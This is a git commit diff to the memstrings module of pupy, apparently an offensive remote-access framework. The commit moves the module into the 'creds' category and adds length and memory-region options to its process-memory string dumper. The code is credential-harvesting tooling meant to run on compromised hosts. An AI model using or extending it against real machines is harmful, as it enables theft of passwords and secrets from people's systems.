Add options for memorpy optimizations and required length

2017-04-11 14:33:31 +03:00 · 2017-04-11 14:33:31 +03:00 · d257c92a57
parent e187f02a14
commit d257c92a57
2 changed files with 26 additions and 8 deletions
--- a/pupy/modules/memstrings.py
+++ b/pupy/modules/memstrings.py
@ -5,7 +5,7 @@ from pupylib.utils.rpyc_utils import obtain

 __class_name__="MemStrings"

-@config(cat="memstrings", compat=["windows", "linux"])
+@config(cat="creds", compat=["windows", "linux"])
 class MemStrings(PupyModule):
    """
        Dump printable strings from process memory for futher analysis
@ -15,8 +15,21 @@ class MemStrings(PupyModule):
    def init_argparse(self):
        self.arg_parser = PupyArgumentParser(prog='memstrings', description=self.__doc__)
        action = self.arg_parser.add_mutually_exclusive_group(required=True)
-        action.add_argument('-p', '--pid', nargs='*', type=int, default=[])
-        action.add_argument('-n', '--name', nargs='*', default=[])
+        action.add_argument('-p', '--pid', nargs='*', type=int, default=[],
+                                help='Include processes with specified pids')
+        action.add_argument('-n', '--name', nargs='*', default=[],
+                                help='Include processes with specified names')
+        self.arg_parser.add_argument('-o', '--omit', type=str, default='isrx',
+                                help='Avoid scanning: '
+                                'i - ranges with file mapping; '
+                                's - ranges with shared region; '
+                                'x - ranges with executable region; '
+                                'r - ranges with read-only region')
+        self.arg_parser.add_argument('-l', '--min-length', type=int, default=4,
+                                help='Show only strings which are longer then specified length')
+        self.arg_parser.add_argument('-m', '--max-length', type=int, default=51,
+                                help='Show only strings which are shorter then specified length')
+
        self.arg_parser.add_argument(
            '-log',
            help='Save output to file. Omit output to stdout. You can use vars: '
@ -26,7 +39,12 @@ class MemStrings(PupyModule):

    def run(self, args):
        targets = args.pid + args.name
-        dump = self.client.conn.modules.memstrings.find_strings(targets)
+        dump = self.client.conn.modules.memstrings.find_strings(
+            targets,
+            min_length=args.min_length,
+            max_length=args.max_length,
+            omit=args.omit
+        )
        dump = obtain(dump)
        if not dump:
            self.error('No dumps received')
--- a/pupy/packages/all/memstrings.py
+++ b/pupy/packages/all/memstrings.py
@ -11,7 +11,7 @@ def try_int(x):
    except:
        return x

-def find_strings(targets, min_length=4):
+def find_strings(targets, min_length=4, max_length=51, omit='isxr'):
    if not targets:
        return {}

@ -21,8 +21,9 @@ def find_strings(targets, min_length=4):
    targets = set([ try_int(x) for x in targets ])
    results = {}

+    printable = re.compile('^[\x20-\x7e]{{{},{}}}$'.format(min_length, max_length))
+
    for process in memorpy.Process.list():
-        print os.path.basename(process.get('name')), process.get('name'), targets
        if not (
            os.path.basename(process.get('name')) in targets or process.get('pid') in targets
        ):
@ -35,9 +36,8 @@ def find_strings(targets, min_length=4):
        }

        mw = memorpy.MemWorker(pid=process.get('pid'))
-        printable = re.compile('^[\x20-\x7e]{{{},}}$'.format(min_length))
        duplicates = set()
-        for _, (cstring,) in mw.mem_search('([^\x00]+)', ftype='groups', optimizations='i'):
+        for _, (cstring,) in mw.mem_search('([^\x00]+)', ftype='groups', optimizations=omit):
            if printable.match(cstring):
                if not cstring in duplicates:
                    duplicates.add(cstring)